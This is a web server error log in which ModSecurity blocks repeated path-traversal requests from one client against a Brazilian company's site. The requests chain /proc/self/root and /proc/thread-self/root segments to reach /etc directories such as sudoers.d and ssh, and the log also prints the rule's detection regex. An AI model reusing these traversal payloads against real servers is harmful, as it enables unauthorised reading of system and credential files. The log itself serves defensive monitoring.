[Mon Mar 16 12:03:05.931396 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:43720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbqbysWC90G-1nBrBBzAAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:03:07.097505 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.243.203:43732] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbqxXjF1vJNtV6CWry9gAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:03:09.465151 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:43744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbrdSswJuvopo3lOhaawAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:03:10.823885 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.243.203:33756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbrnbQATo66fKoS7xLIQAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:03:12.153604 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:33760] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbsLABkC4fWIHEf8HnSwAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:03:26.299536 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:33776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbvtSswJuvopo3lOhaewAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:03:28.628266 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:33804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbwBXjF1vJNtV6CWry-QAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:03:31.151457 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:33820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbw7ysWC90G-1nBrBBzwAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:03:51.071199 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.244.31:52386] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgb146lpbStxTqkSktpDAAAAk4"]
[Mon Mar 16 12:03:51.696304 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:39904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb17ysWC90G-1nBrBB4gAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:03:53.018313 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:37582] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb2Y6lpbStxTqkSktpDwAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:03:56.304954 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:37588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb3LysWC90G-1nBrBB5QAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:04:00.987579 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.243.203:37602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb4HbQATo66fKoS7xLLAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:04:02.281444 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.243.203:52534] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb4pqj1wV0Si-OkefpLAAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:04:03.556969 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:52536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb45qj1wV0Si-OkefpLQAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:04:04.907098 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:52538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb5Jqj1wV0Si-OkefpLwAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:04:06.071082 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:52552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb5o6lpbStxTqkSktpJwAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:04:07.434956 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:52566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb57ABkC4fWIHEf8HnTwAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:04:08.601820 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.243.203:52572] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb6HbQATo66fKoS7xLLQAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:04:11.163502 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.243.203:52584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb6xXjF1vJNtV6CWrzAAAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:04:18.153122 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:35760] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgb8glT9VtDQc7bgUysYQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:04:38.632104 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:35766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcBv9ocpUE4ed4uDzq0wAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
